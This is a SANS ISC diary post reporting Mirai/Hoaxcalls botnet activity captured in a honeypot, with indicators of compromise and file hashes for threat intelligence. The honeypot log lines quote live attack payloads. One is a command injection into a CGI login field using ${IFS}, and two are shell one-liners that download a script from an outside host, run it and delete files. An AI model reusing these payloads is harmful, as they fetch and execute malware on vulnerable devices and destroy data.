Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: Mirai Botnet Activity SANS ISC InfoSec Forums

Participate: Learn more about our honeypot network
https://isc.sans.edu/honeypot.html

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Mirai Botnet Activity

This past week, I noticed new activity from the Mirai botnet in my honeypot. The sample log with the IP and file associated with the first log appears to have been taken down (96.30.193.26) which appeared multiple times this week including today. However, the last two logs from today are still active which is using a Bash script to download multiple exploits targeting various device types (MIPS, ARM4-7, MPSL, x86, PPC, M68k). Something else of interest is the User-Agent: XTC and the name viktor which appear to be linked to XTC IRC Botnet, aka Hoaxcalls.

  • 20200613-025717: 192.168.25.9:80-115.85.32.210:55065 data 'POST /cgi-bin/mainfunction.cgi HTTP/1.1\r\nUser-Agent: XTC\r\nHost: 127.0.0.1\r\nContent-Length: 189\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\n\r\naction=login&keyPath='wget${IFS}http://96.30.193.26/arm7${IFS}-O${IFS}/tmp/viktor;${IFS}chmod${IFS}777${IFS}/tmp/viktor;${IFS}/tmp/viktor'&loginUser=a&loginPwd=a\r\n\r\n'
  • 20200613-101614: 192.168.25.9:8088-36.82.97.160:41885 data 'cd /tmp; wget http://185.172.111.214/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; rm -rf *\r\n\r\n'
  • 20200613-101617: 192.168.25.9:8088-36.82.97.160:33090 data 'cd /tmp; wget http://185.172.111.214/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; rm -rf *\r\n\r\n'

Indicators of Compromise

  • http://96.30.193[.]26/arm7
  • http://185.172.111[.]214/8UsA[.]sh
  • User-Agent: XTC

Suspisious Files and Scripts:

  • UnHAnaAW.sh4 - 5d646c4f5d1793a6070bb03b069f263529b4bc470ab4d5960ae55a211eb9b2f1
  • 8UsA.sh - 590d00e051703e55be2ad10fa94eadc499262bf8a62190a648a7a2756fd31862

[1] https://www.virustotal.com/gui/file/5d646c4f5d1793a6070bb03b069f263529b4bc470ab4d5960ae55a211eb9b2f1/detection
[2] https://security.radware.com/ddos-threats-attacks/threat-advisories-attack-reports/hoaxcalls-evolution/
[3] https://blog.radware.com/security/botnets/2020/05/whos-viktor-tracking-down-the-xtc-polaris-botnets/
[4] https://isc.sans.edu/ipinfo.html?ip=115.85.32.210
[5] https://isc.sans.edu/ipinfo.html?ip=185.172.111.214
[6] https://isc.sans.edu/ipinfo.html?ip=96.30.193.26
[7] https://isc.sans.edu/ipinfo.html?ip=36.82.97.160

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

Guy

481 Posts
ISC Handler
Jun 13th 2020

Sign Up for Free or Log In to start participating in the conversation!